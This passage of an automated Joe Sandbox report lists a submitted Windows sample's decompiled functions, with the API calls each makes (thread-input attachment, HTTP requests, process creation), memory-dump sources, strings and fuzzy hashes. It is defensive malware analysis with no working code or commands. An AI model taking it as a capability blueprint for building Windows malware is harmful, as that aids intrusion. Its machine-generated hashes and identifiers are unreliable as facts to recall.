                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: 9c73bfc5deab2849aca25d051f44daf2c3475e1248acf9047113f8503504f0fe
                                                                                                                    • Instruction ID: 9c337ea5c7699b2d03377755c7ce399a656c0cbfe9128d086c0fdad9c0d47304
                                                                                                                    • Opcode Fuzzy Hash: 9c73bfc5deab2849aca25d051f44daf2c3475e1248acf9047113f8503504f0fe
                                                                                                                    • Instruction Fuzzy Hash: 6E217174A01209BFDF16ABA4CC96FFEBB68EF44300F504056F951972E2DB759815DA20
                                                                                                                    Function 00309163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32 ref: 0030916F
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00309184
                                                                                                                    • _wcscmp.LIBCMT ref: 00309196
                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00309211
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                    • Opcode ID: 92f2611b40b4086ee3a7c5c747c8ffa8f41943410167c0db46c2fd9ae48ba4eb
                                                                                                                    • Instruction ID: 776257d42cd1fa6e26e98de8236b2f1ce408a5faefcff74768be0ff295d4f19d
                                                                                                                    • Opcode Fuzzy Hash: 92f2611b40b4086ee3a7c5c747c8ffa8f41943410167c0db46c2fd9ae48ba4eb
                                                                                                                    • Instruction Fuzzy Hash: 4E110A3625930BB9FA176624DC1BEE737DC9B25720F200427F900A44D7EF626C615994
                                                                                                                    Function 00317990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00317A6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1725837607-0
                                                                                                                    • Opcode ID: 2e01827b4c2a9fcbca4ff30f00ab01f3019574168a3c302510cf5200517162f5
                                                                                                                    • Instruction ID: c81fef2159dd4a7ae6ee4332103be98eb63f096e9e5eae1dc4807e0680d7f6fc
                                                                                                                    • Opcode Fuzzy Hash: 2e01827b4c2a9fcbca4ff30f00ab01f3019574168a3c302510cf5200517162f5
                                                                                                                    • Instruction Fuzzy Hash: E7B18E7190820A9FDB16DFA4C884BFEB7B9EF0D321F294429E501EB251D734E981CB90
                                                                                                                    Function 003111CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003111F0
                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00310268,?,00000001), ref: 00311204
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0031120B
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 0031121A
                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0031122C
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 00311245
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 00311257
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 0031129C
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 003112B1
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 003112BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: 625cdfe0e5620f2381c574c1a88d557e5aba2dd815e8542160aeb5ff340ff30b
                                                                                                                    • Instruction ID: 8001f555d9b22c75c9d18ce42a204373da210dbab9df2ae98c0207c8dc2f823b
                                                                                                                    • Opcode Fuzzy Hash: 625cdfe0e5620f2381c574c1a88d557e5aba2dd815e8542160aeb5ff340ff30b
                                                                                                                    • Instruction Fuzzy Hash: DE31F075A00A08BFDB279F50EC8AFEA37ADEB58311F114525FE08C61A0D3B09DC18B60
                                                                                                                    Function 002BFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002BFAA6
                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 002BFB45
                                                                                                                    • UnregisterHotKey.USER32(?), ref: 002BFC9C
                                                                                                                    • DestroyWindow.USER32(?), ref: 002F45D6
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 002F463B
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002F4668
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                    • Opcode ID: 50ab722c21ef4fc7172b436439359c43f7b79f1a2449df7d6ee382bb8efc2b08
                                                                                                                    • Instruction ID: 8668cebad4637b78c25fdf8f72cbec1678019659034bc1a94163345b63249aa0
                                                                                                                    • Opcode Fuzzy Hash: 50ab722c21ef4fc7172b436439359c43f7b79f1a2449df7d6ee382bb8efc2b08
                                                                                                                    • Instruction Fuzzy Hash: F3A18030721116CFCB19EF14C995BBAF764AF05780F5442BDE90AAB261DB70AD62CF50
                                                                                                                    Function 00329113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                    • String ID: ,,4$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 2862541840-687562478
                                                                                                                    • Opcode ID: 7d95474d9327d0521f0a6348bf2e247584bb3f8510197b972745f3d96738a716
                                                                                                                    • Instruction ID: 0cf9fb7e4df2cfe8c57d4bf4316b112bf5f443fa6c6592d2369cb392f7434e48
                                                                                                                    • Opcode Fuzzy Hash: 7d95474d9327d0521f0a6348bf2e247584bb3f8510197b972745f3d96738a716
                                                                                                                    • Instruction Fuzzy Hash: 23919271E00229EBDF25CFA5D848FAEB7B8EF45710F10855AF515AB280D7709945CFA0
                                                                                                                    Function 0030A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnumChildWindows.USER32(?,0030A439), ref: 0030A377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                    • Opcode ID: f6b5e680437ebd5fa6c63dc81d4f47c1ae2923d4b0a218a91ec9d47cd70a4f90
                                                                                                                    • Instruction ID: 8532179e92f327f51cebb7636db636dbf3983805d7c9a9b556ae5de8e83b3927
                                                                                                                    • Opcode Fuzzy Hash: f6b5e680437ebd5fa6c63dc81d4f47c1ae2923d4b0a218a91ec9d47cd70a4f90
                                                                                                                    • Instruction Fuzzy Hash: FC91D731601B05ABCB09DFA0D4A2BEEFBB8BF04300F55852AD449A7291DF316999CF91
                                                                                                                    Function 002B2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 002B2EAE
                                                                                                                      • Part of subcall function 002B1DB3: GetClientRect.USER32(?,?), ref: 002B1DDC
                                                                                                                      • Part of subcall function 002B1DB3: GetWindowRect.USER32(?,?), ref: 002B1E1D
                                                                                                                      • Part of subcall function 002B1DB3: ScreenToClient.USER32(?,?), ref: 002B1E45
                                                                                                                    • GetDC.USER32 ref: 002ECD32
                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002ECD45
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002ECD53
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002ECD68
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 002ECD70
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002ECDFB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                    • Opcode ID: 2030e07594f0dfb92c8207acd9032d45f65d055afb32c6a567a90f533436231c
                                                                                                                    • Instruction ID: cf8da4885c2ba8a002624a45993df37917d2f4ac0fe7d904109ad7e8c1ac684a
                                                                                                                    • Opcode Fuzzy Hash: 2030e07594f0dfb92c8207acd9032d45f65d055afb32c6a567a90f533436231c
                                                                                                                    • Instruction Fuzzy Hash: 2771F631910246DFCF258FA5CC80AEA3BB5FF48350F64426AED555A265C731DCA2DF60
                                                                                                                    Function 00321A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00321A50
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00321A7C
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00321ABE
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00321AD3
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00321AE0
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00321B10
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00321B57
                                                                                                                      • Part of subcall function 00322483: GetLastError.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 00322498
                                                                                                                      • Part of subcall function 00322483: SetEvent.KERNEL32(?,?,00321817,00000000,00000000,00000001), ref: 003224AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                    • Opcode ID: 77b9f3001280a3e4d408d9135faefd1a9a4db057140dc6f6882e963a52f5e600
                                                                                                                    • Instruction ID: 883c74e4ad61b9635a0ea0c57270a8aab88d50dddcb8ffb658ed55938d63d6dc
                                                                                                                    • Opcode Fuzzy Hash: 77b9f3001280a3e4d408d9135faefd1a9a4db057140dc6f6882e963a52f5e600
                                                                                                                    • Instruction Fuzzy Hash: 79416EB1901228BFEB139F50DD89FBB7BACEF18354F00412AF9059A151E7749E449BA0
                                                                                                                    Function 00328C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0033F910), ref: 00328D28
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0033F910), ref: 00328D5C
                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00328ED6
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00328F00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 560350794-0
                                                                                                                    • Opcode ID: b6e2d7178d8190b014c92381766e83b568398cde4272b561076bb230b2105af4
                                                                                                                    • Instruction ID: 83d6137d0f8b94b4d4a5694b5f1b0d5da6766002ad8f4deddc808e9fa206995a
                                                                                                                    • Opcode Fuzzy Hash: b6e2d7178d8190b014c92381766e83b568398cde4272b561076bb230b2105af4
                                                                                                                    • Instruction Fuzzy Hash: 7DF13871A00229EFCF05DF94D884EAEB7B9FF49314F118499F905AB251DB31AE46CB90
                                                                                                                    Function 0032F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0032F6B5
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0032F848
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0032F86C
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0032F8AC
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0032F8CE
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0032FA4A
                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0032FA7C
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0032FAAB
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0032FB22
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4090791747-0
                                                                                                                    • Opcode ID: 373c42d0ac2b4d6887e52bf7043e894d66e0eaaef91e2bc1c5a9669c4f9e9d2c
                                                                                                                    • Instruction ID: 7942bb7be7cfc8f047e2f81801c41d0aadbad31fec687a35031bf10ccb3e6c2f
                                                                                                                    • Opcode Fuzzy Hash: 373c42d0ac2b4d6887e52bf7043e894d66e0eaaef91e2bc1c5a9669c4f9e9d2c
                                                                                                                    • Instruction Fuzzy Hash: C1E1AD316042109FC716EF24D891B6ABBF5AF89354F14896EF8898B2A2CB31DC45CF52
                                                                                                                    Function 00314CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00313697,?), ref: 0031468B
                                                                                                                      • Part of subcall function 0031466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00313697,?), ref: 003146A4
                                                                                                                      • Part of subcall function 00314A31: GetFileAttributesW.KERNEL32(?,0031370B), ref: 00314A32
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00314D40
                                                                                                                    • _wcscmp.LIBCMT ref: 00314D5A
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00314D75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 793581249-0
                                                                                                                    • Opcode ID: 037bd2d089ed31b33024337d2249223de8e71b00c9c438089df6e8a95ae7cec1
                                                                                                                    • Instruction ID: a2a017a5d6315bd024f1ed8b7f62ab685685641d9ec62f4f8f5fb0b546c10708
                                                                                                                    • Opcode Fuzzy Hash: 037bd2d089ed31b33024337d2249223de8e71b00c9c438089df6e8a95ae7cec1
                                                                                                                    • Instruction Fuzzy Hash: E75142B24083459BC725EB60D8819DFB3ECAF88350F40092FF689D7152EF31A589CB66
                                                                                                                    Function 00338645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003386FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 634782764-0
                                                                                                                    • Opcode ID: d8bb62ff721ab46b7b5693fad817747c471173f0a36bb0373eca2027922f04ff
                                                                                                                    • Instruction ID: 1e38eac58d957a452db70624799de43a5c03fcc622c6c0978df419689c662d59
                                                                                                                    • Opcode Fuzzy Hash: d8bb62ff721ab46b7b5693fad817747c471173f0a36bb0373eca2027922f04ff
                                                                                                                    • Instruction Fuzzy Hash: B651A230600344BFEF269F28CCC6FAD7B69EB05350F604115FA55EA5A1CFB1A990CB41
                                                                                                                    Function 002B2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002EC2F7
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002EC319
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002EC331
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002EC34F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002EC370
                                                                                                                    • DestroyIcon.USER32(00000000), ref: 002EC37F
                                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002EC39C
                                                                                                                    • DestroyIcon.USER32(?), ref: 002EC3AB
                                                                                                                      • Part of subcall function 0033A4AF: DeleteObject.GDI32(00000000), ref: 0033A4E8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
